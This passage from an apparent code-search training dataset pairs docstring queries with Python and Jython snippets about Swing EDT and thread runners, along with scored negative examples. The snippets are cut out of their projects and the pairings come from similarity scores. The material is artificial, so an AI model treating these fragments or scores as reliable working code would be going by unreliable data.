self.assertEqual(TestExtension.registration.name,\n self.test_project_name)\n 
self.assertTrue(TestExtension.registration.enabled)", "def get_optional_extensions(self):\n return []", "def extensions(self):\n return list(self._list(extension.Extension, paginated=False))", "def test_19_file_extensions_within_type(self):\n print (self.test_19_file_extensions_within_type.__doc__)\n\n stats_maker = StatsMakerFiles()\n r = stats_maker.view_file_extensions_within_type(file_type=FILE_TYPE_OCTET_STREAM)\n\n num_unique_extensions = r.result_data.get('number_unique_extensions')\n\n # check number of extensions\n #\n self.assertEqual(num_unique_extensions, 67)\n\n # check that list length matches number of extensions\n #\n ext_counts = r.result_data.get('records', [])\n self.assertEqual(len(ext_counts), 67)\n\n print ('ext_counts', ext_counts[4])\n # check 5th listing in extension count list\n #\n listing_5 = OrderedDict([('extension', u'.docx'), ('count', 15), ('total_count', 437), ('percent_string', '3.432%')])\n\n self.assertEqual(listing_5, ext_counts[4])" ]
[ "0.6085889", "0.60732716", "0.60676134", "0.6062981", "0.5867079", "0.5847451", "0.58071655", "0.57089275", "0.56770766", "0.5671906", "0.56402373", "0.5582146", "0.5570287", "0.5542473", "0.5539861", "0.5514397", "0.549309", "0.54413986", "0.5440934", "0.5427723", "0.5409136", "0.54011464", "0.5365408", "0.5365408", "0.53493196", "0.5347066", "0.5336513", "0.53349745", "0.53344864", "0.53344667", "0.53091526", "0.5290738", "0.52905625", "0.5287208", "0.52836615", "0.52730733", "0.5271734", "0.5251521", "0.52515167", "0.5237998", "0.52268386", "0.51758915", "0.5159194", "0.5158534", "0.5150624", "0.5145897", "0.513017", "0.51296276", "0.51200074", "0.5108832", "0.50879115", "0.50784034", "0.50778604", "0.5074822", "0.5074822", "0.50641656", "0.5058123", "0.50565994", "0.5052455", "0.50177574", "0.50094175", "0.5000893", "0.5000507", "0.49993044", "0.4994558", "0.4983155", "0.49731967", "0.4960678", "0.49563998", "0.49498144", "0.49452302", "0.4941237", "0.49406964", "0.49339858", "0.49315944", "0.49187443", "0.49161315", "0.49135935", "0.48952958", "0.48912594", "0.4890105", "0.48886514", "0.488671", "0.48843768", "0.48774952", "0.4874218", "0.48697656", "0.4863722", "0.485543", "0.4853677", "0.48534262", "0.4853042", "0.48445448", "0.484232", "0.48403", "0.48343495", "0.48301816", "0.4819524", "0.4814921", "0.48104823" ]
0.5237927
40
Will detect and then run the codeblock on the EDT
def genericSwingEDTRunner(ifOffEDTThenRunNowAndWait, ifOnEDTThenRunNowAndWait, codeblock, *args): isOnEDT = SwingUtilities.isEventDispatchThread() # myPrint("DB", "** In .genericSwingEDTRunner(), ifOffEDTThenRunNowAndWait: '%s', ifOnEDTThenRunNowAndWait: '%s', codeblock: '%s', args: '%s'" %(ifOffEDTThenRunNowAndWait, ifOnEDTThenRunNowAndWait, codeblock, args)) myPrint("DB", "** In .genericSwingEDTRunner(), ifOffEDTThenRunNowAndWait: '%s', ifOnEDTThenRunNowAndWait: '%s', codeblock: <codeblock>, args: <args>" %(ifOffEDTThenRunNowAndWait, ifOnEDTThenRunNowAndWait)) myPrint("DB", "** In .genericSwingEDTRunner(), isOnEDT:", isOnEDT) class GenericSwingEDTRunner(Runnable): def __init__(self, _codeblock, arguments): self.codeBlock = _codeblock self.params = arguments def run(self): myPrint("DB", "** In .genericSwingEDTRunner():: GenericSwingEDTRunner().run()... about to execute codeblock.... isOnEDT:", SwingUtilities.isEventDispatchThread()) self.codeBlock(*self.params) myPrint("DB", "** In .genericSwingEDTRunner():: GenericSwingEDTRunner().run()... finished executing codeblock....") _gser = GenericSwingEDTRunner(codeblock, args) if ((isOnEDT and not ifOnEDTThenRunNowAndWait) or (not isOnEDT and not ifOffEDTThenRunNowAndWait)): myPrint("DB", "... calling codeblock via .invokeLater()...") SwingUtilities.invokeLater(_gser) elif not isOnEDT: myPrint("DB", "... calling codeblock via .invokeAndWait()...") SwingUtilities.invokeAndWait(_gser) else: myPrint("DB", "... calling codeblock.run() naked...") _gser.run() myPrint("DB", "... finished calling the codeblock via method reported above...")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def run(self):\n self.window.mainloop()", "def takeControl(self):\n mainloop()", "def takeControl(self):\n mainloop()", "def exec(self):\n if self._root.master is None:\n self._root.mainloop()", "def run(self):\n self.ident = threading.current_thread().ident\n self.ready.set()\n self.exec_()", "def run():\n gui = GUI()\n gui.mainloop()", "def run(self):\n\t\tgtk.gdk.threads_init()\t\t\t# (!) important for multi-threading to work with GTK+\n\t\tself.__update_timer = gobject.timeout_add(250, self.__update, self)\n\t\tself.statusbar1.push(0, \"Ready (for about dialog; right-click to lower right corner).\")\n\t\tgtk.main()", "def run(self):\n\n while not self.done:\n\n self.event_loop()\n\n self.update()", "def mainloop(self):\n self.root.mainloop()", "def mainloop(self):\n self.root.mainloop()", "def exec(self):\n self._root.after(100, self.change_state, States.INITIAL) # enter the state once gui is setup\n super().exec()", "def loop_run(self):\n super(EventLoop, self).loop_run()\n self.inq = self.cothread.EventQueue()", "def mainloop(self):\n self.master.mainloop()", "def execute_block_now(event):\n b = event.cli.current_buffer\n b.validate_and_handle()", "def main(self):\n self.root.mainloop()", "def run(self):\n if self.okay:\n ExtLoopWin32.run()", "def mainloop(self):\n\t\tself.root.after(100, self.tkloop)\n\t\tself.root.mainloop()", "def run_main_loop():\n mainloop = GObject.MainLoop()", "def run(self):\n self.cmdloop()", "def main(self):\n self.validate()\n self.root.mainloop()", "def dispatch_loop(self):\n pass", "def mainloop(self):\r\n self.bindHotkeys()\r\n self.root.mainloop()", "def run(self):\n GLib.MainLoop().run()", "def run(self):\n self.run()", "def block(self):\n pass", "def exec(self) -> bool:\n return bool(self._widget._mgui_exec())", "def run(self):\n self.monitorTextBox.setPlainText(\"\")\n self.applyChanges()\n self.toolBox.setCurrentIndex(4)\n if self.dat.surrogateProblem == None:\n return\n tool = self.toolSelectBox.currentText()\n pg = self.dat.surrogateMethods.plugins[tool].surrogateMethod(self.dat)\n pg.loadDict(self.dat.surrogateProblem[tool])\n pg.start()\n self.pg = pg\n self.a = True\n self.timer.start(self.updateDelay)\n self.timeRunning = time.time()\n self.runButton.setEnabled(False)\n self.stopButton.setEnabled(True)\n self.setStatusBar.emit(\"Surrogate Generation Running\")", "def _run(self):\n while(self._loop):\n pass", "def _run_delayed_gui_load_code(self):\n #Stop the timer.\n self._delayed_gui_timer.stop()\n print(f'_run_delayed_gui_load_code() called!')\n # Try to select the first combo item after they've loaded\n self.ui.contextSelectorWidget._trySelectFirstComboItem()", "def block(self):\n # I WILL RUN FOR EVER \n # BUT WHY ARE YOU RUNNING ?\n self.__loop.run_forever()", "def mainloop(self, *args, **kwargs):\n if in_idle():\n return\n self.top.mainloop(*args, **kwargs)", "def cb_gui_test_1( self, ):\r\n print( \"cb_gui_test_1\" )\r\n self.helper_thread.toggle_lock()", "def postloop(self):\n print 'Bye!'", "def on_run_clicked(self):\n self.start_threading()\n self.stepping = False\n self.step_event.set()", "def run( self ):\r\n \r\n # Execute the per-cycle work specifed by the user\r\n for f in self.updateFuncList:\r\n f() # Please make these lightweight and pertain to UI drawing!\r\n \r\n # Update window\r\n self.rootWin.update_idletasks() # idk , draw or something!\r\n \r\n # Wait remainder of period\r\n elapsed = time.time() * 1000 - self.last\r\n if elapsed < self.stepTime:\r\n sleepTime = int( self.stepTime - elapsed ) \r\n else:\r\n 
sleepTime = 0\r\n # 4.e. Mark beginning of next loop\r\n self.last = time.time() * 1000 \r\n self.rootWin.after( sleepTime , self.run )", "def mainloop(self, *args, **kwargs):\n if in_idle():\n return\n self._top.mainloop(*args, **kwargs)", "def run_message_loop(self):\n raise NotImplementedError", "def __macroRun(self):\n self.activeWindow().macroRun()", "def run_user_code(self, button):\n button.setEnabled(False)\n self.user_thread.start()", "def show(self):\n QtGui.QGuiApplication.processEvents()", "def run(self):\n self.root.mainloop()\n #self.root.destroy()", "def __loop(self):\n\n self.__update_table()\n self.__update_labels()\n if self.remote_stop:\n self.__stop(\"remote telegram admin\")\n else:\n self.__main_window.after(1000, self.__loop)", "def event_loop(self):\n if self.message_counter:\n if not self.msg:\n self.showdialog()\n else:\n self.msg.setText(\n \"COMET encounterd {} error(s)\".format(self.message_counter).ljust(\n 70\n )\n )", "def cb_gui_test_3( self, ):\r\n #self.task_list.stop_auto( )\r\n #self.gh_graphing.testGraph()\r\n print( \"cb_gui_test_3 commented out \" )", "def game_loop(self):\n self.interface.game_loop(self)", "def idle():", "def run(self): \r\n return", "def run(self):\n self.loop.spawn_callback(self.main)\n self.loop.start()\n if self.exc_info:\n six.reraise(*self.exc_info)", "def run(self, repl_callback, sleep_time=0.01):\n\n # The sleep_time is 100Hz by default, which seems like an ok balance\n # between CPU strain and smooth animations. Ideally we'd run a\n # real event loop though, that is fast when needed and just sleeps\n # when the gui is idle, saving battery life.\n\n if hasattr(time, \"perf_counter\"):\n perf_counter = time.perf_counter\n else:\n perf_counter = time.time\n perf_counter\n\n repl_time = 0.099\n next_repl = perf_counter() + repl_time\n\n # The toplevel while-loop is just to catch Keyboard interrupts\n # and then proceed. The inner while-loop is the actual event loop.\n while True:\n try:\n while True:\n time.sleep(sleep_time)\n self.process_events()\n if perf_counter() > next_repl:\n next_repl = perf_counter() + repl_time\n repl_callback()\n\n except KeyboardInterrupt:\n self._keyboard_interrupt()\n except TypeError:\n # For some reason, when wx is integrated, keyboard interrupts\n # result in a TypeError.\n # I tried to find the source, but did not find it. 
If anyone\n # has an idea, please e-mail me!\n if \"_wx\" in self.__class__.__name__.lower():\n self._keyboard_interrupt()", "def mainloop(self):\n self.app.mainloop()", "def __run(self):\n # init snake show\n self.__init_snake()\n self.__introduction.hide()\n # start ticktock for snake moving\n self.__ticker.start()\n # enable key press\n self.__enable_key = True", "def run(self):\r\n pass", "def start(self):\n self.root.mainloop()", "def run(self):\n\t\t\n\t\twhile self.update():\n\t\t\tpass", "def run_command(self):\r\n self.update_settings()\r\n self.run = True\r\n self.pause = False\r\n if self.run_call is not None:\r\n self.wm.after(1, self.run_call)", "def __run(self):\n sys.settrace(self.globaltrace) # set self.globaltrace before thread start\n self.__run_backup()\n self.run = self.__run_backup", "def run(self):\n self.centre.findChild(QPushButton, \"confirmBtn\").hide()\n self.centre.findChild(QPushButton, \"cancelBtn\").hide()\n self.centre.findChild(QLabel, \"loadingLabel\").show()\n self.centre.findChild(QLabel, \"title\").setText(\"Optimisation & Visualisation Processing\")\n self.finished.emit()", "def run(self):\n # self.root.mainloop()\n # self.root.destroy()", "def run(self):\n while self.__running:\n enum = self.__gui_app.pollButtonEvent()\n if enum != '':\n print enum\n if int(enum, 16) == 4:\n self.__qf.tick()\n else:\n self._publish(enum)\n\n print \"Exit: %s\\n\" % self", "def run(self):\n # show the dialog\n self.dlg.show()\n # Run the dialog event loop\n result = self.dlg.exec_()\n # See if OK was pressed\n if result:\n # Do something useful here - delete the line containing pass and\n # substitute with your code.\n pass", "def run(self):\n # show the dialog\n self.dlg.show()\n # Run the dialog event loop\n result = self.dlg.exec_()\n # See if OK was pressed\n if result:\n # Do something useful here - delete the line containing pass and\n # substitute with your code.\n pass", "def run(self):\n # show the dialog\n self.dlg.show()\n # Run the dialog event loop\n result = self.dlg.exec_()\n # See if OK was pressed\n if result:\n # Do something useful here - delete the line containing pass and\n # substitute with your code.\n pass", "def run(self):\n # show the dialog\n self.dlg.show()\n # Run the dialog event loop\n result = self.dlg.exec_()\n\n # See if OK was pressed\n if result:\n # Do something useful here - delete the line containing pass and\n # substitute with your code.\n pass", "def main():\n PanelDemo().mainloop()", "def exec_(self, *args, **kwargs):\n print_mainloop_warning(mainloopWarning_qt)\n\n # Store local namespaces (scopes) of any functions that\n # precede this call. 
It might have a widget or application\n # object that should not be deleted ...\n import inspect, __main__\n\n for caller in inspect.stack()[1:]:\n frame, name = caller[0], caller[3]\n if name.startswith(\"<\"): # most probably \"<module>\"\n break\n else:\n __main__.__dict__[name + \"_locals\"] = frame.f_locals\n\n # Tell interpreter to ignore any system exits\n sys._pyzoInterpreter.ignore_sys_exit = True\n\n # But re-enable it as soon as *this event* is processed\n def reEnableSysExit():\n sys._pyzoInterpreter.ignore_sys_exit = False\n\n self._reEnableSysExitTimer = timer = QtCore.QTimer()\n timer.singleShot(0, reEnableSysExit)", "def run(self, event):\n pass", "def _run(self):\n raise NotImplementedError", "def _run(self):\n raise NotImplementedError", "def mainloop(duration=1):\n\n _triggered.clear()\n NSApp = _NSApp()\n _stop_after(duration)\n msg(NSApp, n(\"run\"))\n if not _triggered.is_set():\n # app closed without firing callback,\n # probably due to last window being closed.\n # Run the loop manually in this case,\n # since there may be events still to process (ipython/ipython#9734)\n CoreFoundation.CFRunLoopRun()", "def _run(self):\n raise NotImplemented(\"Abstract method '_run' need to be defined\")", "async def next_frame() -> None:\n await run_in_main_thread(lambda: None)", "def mock_dear_py_gui():\n def _gui_thread(self):\n while not self.stop:\n _ = self.process_data.get()\n\n BaseRealTimeVisualizer._gui_thread = _gui_thread\n BaseRealTimeVisualizer.should_close = lambda self: False", "def run(self):\n while self.running:\n QtCore.QCoreApplication.processEvents()", "def wait(self):\n self.mainloop().wait()", "def startIfNeeded(self):\n assert self.notify.debugStateCall(self)\n # we need a try to stop the level editor from crashing\n try: \n self.curPhase = self.getPhaseToRun()\n if self.curPhase >= 0:\n self.request('DoAnim')\n except:\n pass", "def _run(self):\n raise NotImplementedError", "def run(self):\n # While loop to show display\n while True:\n for event in pg.event.get():\n # Quitting game\n if event.type == QUIT:\n pg.quit()\n sys.exit()\n # If game can continue\n if self.b.get_status() == \"-\":\n # Pressing mouse\n if event.type == MOUSEBUTTONDOWN:\n pos = pg.mouse.get_pos()\n for r in self.b.get_board_array():\n for square in r:\n if square.get_visual().collidepoint(pos):\n square.click()\n self.b.update_board()", "def _run(self):\n\n self.is_running = False\n self.start()\n self.function(*self.args, **self.kwargs)", "def _event_loop(self):\n while True:\n self.scheduler.run(blocking=True)\n time.sleep(1)", "def __call__(self):\n self.show()", "def block(self):\n while self.running:\n time.sleep( 1 )", "def _do_begin(self):\n self.backend.begin()", "def run(self):\n self.func()", "def refresh(self):\n\n if self.eventBox.window != None:\n self.eventBox.window.set_cursor(None)\n self.enable_controls(False)\n threading.Thread(target=self.thread_refresh).start()", "def game_tick_run(self):\n pass", "def run(self):\n self.ae.start()", "def run(self):\n\n # Create the dialog with elements (after translation) and keep reference\n # Only create GUI ONCE in callback, so that it will only load when the plugin is started\n self.estatInicial()\n \n self.dlg.show()\n # Run the dialog event loop\n result = self.dlg.exec_()\n # See if OK was pressed\n if result:\n # Do something useful here - delete the line containing pass and\n # substitute with your code.\n pass", "def run(self):\n while self._update_func():\n self.update_signal.emit(None)", "def _ipython_display_(self):\n 
with self._sc:\n self._box._ipython_display_()", "def run(self):\n self.schedule_next_event()\n response = super(CountdownDialog, self).run()\n self.destroy()\n\n if response != gtk.RESPONSE_ACCEPT:\n raise TestCancelled()", "def debug_run(self):\n self.emit(QtCore.SIGNAL(\"debug_run\"))", "def run(self):\n\n observer = Observer()\n observer.schedule(self.ehandler, \"./gl\", True)\n observer.start()\n observer.join()", "def fireMDPreferencesUpdated():\n myPrint(\"DB\", \"In \", inspect.currentframe().f_code.co_name, \"()\" )\n\n class FPSRunnable(Runnable):\n def __init__(self): pass\n\n def run(self):\n myPrint(\"DB\",\".. Inside FPSRunnable() - calling firePreferencesUpdated()...\")\n myPrint(\"B\",\"Triggering an update to the Summary/Home Page View\")\n MD_REF.getPreferences().firePreferencesUpdated()\n\n if not SwingUtilities.isEventDispatchThread():\n myPrint(\"DB\",\".. Not running within the EDT so calling via FPSRunnable()...\")\n SwingUtilities.invokeLater(FPSRunnable())\n else:\n myPrint(\"DB\",\".. Already running within the EDT so calling FPSRunnable() naked...\")\n FPSRunnable().run()\n return", "def run(self):\n pass", "def run(self):\n pass", "def run(self):\n pass", "def run(self):\n pass", "def run(self):\n pass", "def run(self):\n pass", "def run(self):\n pass" ]
[ "0.6536498", "0.64465624", "0.64465624", "0.6426398", "0.63144535", "0.61656505", "0.61306715", "0.60988885", "0.6066413", "0.6066413", "0.6001287", "0.59971917", "0.59842736", "0.5967664", "0.59582716", "0.5954346", "0.5944975", "0.59409404", "0.5900608", "0.58864576", "0.58551013", "0.5854173", "0.5829394", "0.58157957", "0.5808614", "0.57962173", "0.5795168", "0.57730794", "0.5766953", "0.57541233", "0.57510203", "0.5739478", "0.57257444", "0.5711411", "0.57085943", "0.5697658", "0.56858104", "0.5668062", "0.5667239", "0.5655469", "0.5652291", "0.56401837", "0.56334907", "0.5624765", "0.5622892", "0.5620886", "0.5617065", "0.56159073", "0.56012857", "0.5598907", "0.55982417", "0.559281", "0.55812955", "0.55789065", "0.5569227", "0.5568057", "0.55568796", "0.55427766", "0.5537586", "0.55366194", "0.55366194", "0.55366194", "0.5530434", "0.5526938", "0.5519359", "0.55180186", "0.55151325", "0.55151325", "0.5513162", "0.55112845", "0.54871947", "0.5470549", "0.5470274", "0.5466113", "0.5463601", "0.54557264", "0.54533553", "0.54474294", "0.5444968", "0.543987", "0.54367363", "0.54066956", "0.54043424", "0.538681", "0.53859246", "0.53820443", "0.5380925", "0.5368903", "0.5360745", "0.5355597", "0.5352274", "0.53499305", "0.5349462", "0.5331168", "0.5331168", "0.5331168", "0.5331168", "0.5331168", "0.5331168", "0.5331168" ]
0.6598361
0
Will run the codeblock on a new Thread
def genericThreadRunner(daemon, codeblock, *args): # myPrint("DB", "** In .genericThreadRunner(), codeblock: '%s', args: '%s'" %(codeblock, args)) myPrint("DB", "** In .genericThreadRunner(), codeblock: <codeblock>, args: <args>") class GenericThreadRunner(Runnable): def __init__(self, _codeblock, arguments): self.codeBlock = _codeblock self.params = arguments def run(self): myPrint("DB", "** In .genericThreadRunner():: GenericThreadRunner().run()... about to execute codeblock....") self.codeBlock(*self.params) myPrint("DB", "** In .genericThreadRunner():: GenericThreadRunner().run()... finished executing codeblock....") _gtr = GenericThreadRunner(codeblock, args) _t = Thread(_gtr, "NAB_GenericThreadRunner".lower()) _t.setDaemon(daemon) _t.start() myPrint("DB", "... finished calling the codeblock...")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def Run(self):\n self.RunAsync().join()", "def run(self):\n self.ident = threading.current_thread().ident\n self.ready.set()\n self.exec_()", "def process_thread(self):", "def run(self):\n self.thread = threading.Thread(target=self._main)\n self.thread.start()\n self.running = True", "def runAsync(code):\n __PyMainThread__.runAsync(code)", "def _make_thread(self):\r\n pass", "def __init__(self):\n Thread.__init__(self)\n self.start()", "def __init__(self):\n Thread.__init__(self)\n self.start()", "def eval_in_thread(self):\n self._thread = Thread()\n self.interpreter.moveToThread(self._thread)\n self.interpreter.exec_signal.connect(\n self.interpreter.exec_, QueuedConnection)\n return self._thread", "def run(self):\n self.submit()\n self.start()", "def block(self):\n # I WILL RUN FOR EVER \n # BUT WHY ARE YOU RUNNING ?\n self.__loop.run_forever()", "def __run(self):\n sys.settrace(self.globaltrace) # set self.globaltrace before thread start\n self.__run_backup()\n self.run = self.__run_backup", "def _run(self):\n\n self.is_running = False\n self.start()\n self.function(*self.args, **self.kwargs)", "def __init__(self):\n Thread.__init__(self)\n self.start() # start the thread", "def thread_method_block(handler, block_event):\n with ConnectionContext(handler):\n block_event.wait()", "def run(self):\n try:\n result = self._target()\n\n if self.abort:\n ThreadPool().post_event(ThreadResult(result, self._event_on_abort))\n else:\n ThreadPool().post_event(ThreadResult(result, self._event_on_complete))\n\n except Exception as err:\n ThreadPool().post_event(ThreadResult(err.args[0], self._event_on_error))", "def run_in_background(self, function):\n return function()", "def run_async(method):\n Thread(target=method, args=[]).start()", "def run(self):\n self.func()", "def run_in_thread(self, fn, *args, **kwargs):\r\n thread = threading.Thread(target=fn, args=args, kwargs=kwargs)\r\n thread.start()\r\n \r\n return thread", "def runSync(code):\n __PyMainThread__.runSync(code)\n sleep(0.1)", "def run(self):\n # Don't call this from the thread which it represents.\n assert eventlet.corolocal.get_ident() != self.id\n self.caller_sem = Semaphore(0)\n self.my_sem.release()\n self.caller_sem.acquire() # Wait for it to finish.", "def run(self):\n self.loop.spawn_callback(self.main)\n self.loop.start()\n if self.exc_info:\n six.reraise(*self.exc_info)", "def run(self) :\r\n \r\n try:\r\n if self._target:\r\n self._result = self._target(*self._args, **self._kwargs)\r\n except Exception, e :\r\n exc_info = sys.exc_info()\r\n logging.error(\"\".join(traceback.format_exception(*exc_info)))\r\n self._exception = e\r\n finally:\r\n # Avoid a refcycle if the thread is running a function with\r\n # an argument that has a member that points to the thread.\r\n del self._target, self._args, self._kwargs\r\n\r\n self._periodic_progress_dialog.stop()", "def run(self):\n self.run()", "def doctest_BackgroundWorkerThread_run():", "def thread_it(self, callback):\n\n def function():\n self.acquire_event_lock()\n callback()\n # threading.Thread(target=callback).start()\n self.release_event_lock()\n\n return function", "def _start_loop(self):\n self.p = tread.Thread(target=self._loop)\n self.p.start()", "def execute_task(self, task):\n t = threading.Thread(target=task)\n t.start()", "def _run(self):\n while(self._loop):\n pass", "def main_thread_enter(self):\n ...", "def run(self):\n self.cmdloop()", "def run(self):\n self.thread_send.start()\n self.thread_receive.start()", "def run(self):\n self.log.info(\"Starting thread: 
\" + self.name)\n self.object__ = self.run_process(self.object__, self.args)", "def call(self):\n current_thread = threading.current_thread() # get current thread·\n event = self.q.get() # get task from queue\n while event != self.StopEvent: # Determine whether task is a terminator\n\n func, arguments, callback = event # get funcname,params,callback name\n try:\n result = func(*arguments)\n func_excute_status = True # set func executed status success\n except Exception as e:\n func_excute_status = False # set func executed status failure\n result = None\n print('{} executed error:'.format(func.__name__), e)\n\n if func_excute_status: #\n if callback is not None: # determine whetherif callback is None\n try:\n callback(result)\n except Exception as e:\n print(callback.__name__, e)\n\n with self.worker_state(self.free_list, current_thread):\n if self.terminal:\n event = self.StopEvent\n else:\n event = self.q.get()\n\n else:\n self.created_list.remove(current_thread)", "def __enter__(self):\n self.run()\n return self", "def message_handler(self, msg):\n thread = threading.Thread(target=self.answer, args=(msg,))\n thread.start()\n return thread", "def _in_thread(func, *args, **kwargs):\r\n def _f():\r\n func(*args, **kwargs)\r\n t = threading.Thread(target=_f, name='/*/*')\r\n t.start()\r\n return t", "async def next_frame() -> None:\n await run_in_main_thread(lambda: None)", "def run_in_background(self):\n threading.Thread(target=self._run_loop).start()", "def _run(self):\n self._send_sequence() # Share the initial generator\n with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:\n while True:\n if self.stop_signal.is_set():\n return\n\n self.queue.put(\n executor.apply_async(next_sample, (self.uid,)), block=True)", "def run(self):\n try:\n if self._target:\n retval = self._target(*self._args, **self._kwargs)\n self._queue.put(retval)\n except Exception: # pylint: disable=broad-except\n self.err = sys.exc_info()\n logger.debug(\"Error in thread (%s): %s\", self._name,\n self.err[1].with_traceback(self.err[2]))\n finally:\n self._complete.set()\n # Avoid a ref-cycle if the thread is running a function with\n # an argument that has a member that points to the thread.\n del self._target, self._args, self._kwargs", "async def __aenter__(self):\n await self.start()", "def block(self):\n pass", "def run(self, threaded=False):\n if threaded:\n Thread(target=self._run).start()\n else:\n self._run()", "def doctest_BackgroundWorkerThread():", "def block(self):\n while self.running:\n time.sleep( 1 )", "def run (self):\n t = threading.Thread(target=self.runController)\n t.start()", "def _ensure_thread(self) -> None:\n\n if not self._thread:\n thread = self._thread_factory(self.run)\n self._thread = thread\n thread.start()", "def loop_run(self):\n super(EventLoop, self).loop_run()\n self.inq = self.cothread.EventQueue()", "def __enter__(self):\n self.start()\n return self", "def __enter__(self):\n self.start()\n return self", "async def __aenter__(self):\n assert self._task is None\n self._task = self._loop.create_task(self._run())\n return self", "def run(self):\n t = Thread(target=self._listen)\n t.start()", "async def run(self) -> None:", "async def run(self) -> None:", "def RunAsync(self):\n self.running_thread = threading.Thread(name=self.thread_name,\n target=self._RunLoop)\n self.running_thread.daemon = True\n self.running_thread.start()\n return self.running_thread", "def run_in_thread(fn):\r\n @staticmethod\r\n def run(*k):\r\n thread = threading.Thread(target=fn, args=(*k,), daemon = 
True)\r\n thread.start()\r\n return thread # <-- return the thread\r\n return run", "def start(self):\n self.thread.start()", "async def _main(self):\n while True:\n time.sleep(1)", "def run_threaded(self):\n \n t = threading.Thread(target=self.run, args=())\n t.daemon = True\n t.start()\n return t # Return the thread, but don't join it (the caller can join if they want to)", "def start_background_thread(self):\n self.runner = Runner(queue=queue, app_id=self.app_id)\n self.runner.start()\n # TODO: stop the thread at some point?", "def call_in_thread(self, callback):\n self.factory.manager.call_in_thread(callback)", "def run(self):\n self._keep_running()", "def run(self):\n try:\n while self._running:\n time.sleep(1)\n finally:\n self._exit()", "def run(self):\n while True:\n self.sm.run()\n time.sleep(0.05)", "def doctest_BackgroundWorkerThread_scheduleNextWork():", "def run(self, lock):\r\n return self.execute()", "def _transferExecution(self):\n self._btleSubThread = threading.Thread(target=self._executor)\n self._btleSubThread.start()\n\n\t# this method stops the car and quits completly.\n\t# safer than calling quit() from main script", "def run(self):\n self.started()", "def lock(self):\n self.mainloop().lock()", "def launchFunc():\n th = threading.Thread(target=progressScreen)\n th.start()", "def run(self):\n self.arbiter.start()", "async def run(self):\n try:\n await self._execute()\n finally:\n await self._stop()", "def run(self):\n self._started = True # Only set once to true!\n self.gui_block.set() # Unblocked by the GUI\n time.sleep(self.delay) # Should collect data before sending it\n while self._started:\n # If the application has been stopped, wait until it is unblocked\n if not self.gui_block.is_set():\n self.gui_block.wait()\n else:\n # The retriever thread is put into pause, and we wait until it\n # is actually paused. Then, we try to send the data. 
Finally, we\n # wake up the data retrieving thread back again.\n self.retriever.resume.clear()\n self.retriever.is_waiting.wait()\n self.send_data()\n self.retriever.resume.set()\n time.sleep(self.delay)", "def run(self): \r\n return", "def run_in_thread(self, callback: Callable, thread: int, **kwargs) -> None:\n self.run_in(callback, 0, pin=False, pin_thread=thread, **kwargs)", "def run_in_thread(fn):\n def run(*k, **kw):\n t = threading.Thread(target=fn, args=k, kwargs=kw)\n t.start()\n return t\n return run", "def run_in_thread(fn):\n def run(*k, **kw):\n t = threading.Thread(target=fn, args=k, kwargs=kw)\n t.start()\n return t\n return run", "def _make_async_call(self, plugin, info):\r\n self._threads[str(plugin.name)] = thread = IntrospectionThread(plugin, info)\r\n thread.request_handled.connect(self._handle_incoming)\r\n thread.start()", "def background(self):\n self.thread = threading.Thread(target=self.run)\n self.thread.setDaemon(True)\n self.thread.start()", "def start_thread(self):\n self.thread = Thread(target=self.put_lines_into_queue)\n self.thread.daemon = True\n self.thread.start()", "def run(self):\n self.monitor.start()", "def run(self):\n ioloop.IOLoop.current().start()", "def run(self):\n t = threading.Thread(target=self._thread_action,\n args=(self._sensor_queue,))\n t.daemon = True\n t.start()", "def executor(self):", "def call_in_thread(self, callback):\n reactor.callInThread(callback)", "def _run_aimbot_capture_task(self):\n\n if self._running_task is None and self._running_thread is None:\n\n self._running_task = self._system.aimbot_capture_task\n self._running_thread = threading.Thread(target=self._running_task.start)\n self._status_text.set('Aimbot - Capturing')\n self._running_thread.start()", "def pass_message_to_main_thread_fn():\n\n pass", "def do_work(self):", "def run(self):\n\n \"\"\"Call this function before trying to play any video with\n play_segment() or play().\n \"\"\"\n print(\"Task 2 assigned to thread: {}\".format(threading.current_thread().name))\n print(\"ID of process running task 2: {}\".format(os.getpid()))\n\n # If we don't use the MainLoop, messages are never sent.\n def start():\n print(\"Task 3 assigned to thread: {}\".format(threading.current_thread().name))\n print(\"ID of process running task 3: {}\".format(os.getpid()))\n print('====================> Using MainLoop\\n')\n loop = GLib.MainLoop()\n loop.run()\n \n \n print('====================> Starting a new thread for the player\\n')\n t = threading.Thread(target=start, name='thread_player')\n t.start()\n #_thread.start_new_thread(start, ())", "def run(self):\n\n while not self.done:\n\n self.event_loop()\n\n self.update()", "async def _job(self):\n await asyncio.sleep(self._timeout)\n await self._callback()", "def start(self) -> None:\n start_thread(super().start, self.__class__.__name__)", "def _future_work_():\n pass", "def run(self):\n receiver = threading.Thread(target=self.receive_data)\n # Setting daemon to True means that this Thread will be terminated when the main program ends.\n receiver.daemon = True\n receiver.start()", "def doctest_BackgroundWorkerThread_forSite():", "def run(self):\r\n pass", "def __init__(self):\n self.continue_event = threading.Event()", "def run(self):\n \n pass" ]
[ "0.6713125", "0.6663096", "0.6575492", "0.6550865", "0.654327", "0.64968747", "0.6474789", "0.6474789", "0.6473518", "0.64723456", "0.64446056", "0.6290869", "0.62402534", "0.62397003", "0.61925733", "0.6187641", "0.6182442", "0.6176061", "0.61667424", "0.6138981", "0.61323655", "0.6094246", "0.6045352", "0.60410076", "0.6030783", "0.60078484", "0.60065114", "0.5985524", "0.5974132", "0.597016", "0.5967517", "0.5961253", "0.5961147", "0.59581494", "0.5956864", "0.5954301", "0.5926663", "0.592235", "0.59183323", "0.5902369", "0.58920485", "0.5890977", "0.58759314", "0.5875449", "0.58522177", "0.58444846", "0.584036", "0.5836034", "0.5816361", "0.5815054", "0.5807689", "0.5807689", "0.5775825", "0.57718194", "0.5770095", "0.5770095", "0.5761414", "0.57468355", "0.5746141", "0.5740587", "0.57393867", "0.5736791", "0.5736031", "0.5703515", "0.57000333", "0.5695598", "0.5683292", "0.56818336", "0.5674343", "0.5673067", "0.5671095", "0.56644344", "0.56474316", "0.5644087", "0.5634967", "0.56282103", "0.5627267", "0.5626396", "0.5626396", "0.5625433", "0.5624435", "0.56219167", "0.56193626", "0.56124943", "0.5609742", "0.56044835", "0.5597083", "0.55805826", "0.55793554", "0.55671763", "0.55637836", "0.5557856", "0.5554848", "0.5536856", "0.55361426", "0.55238587", "0.5523463", "0.55224776", "0.5521921", "0.55211663" ]
0.6160486
19
read table data from csv file
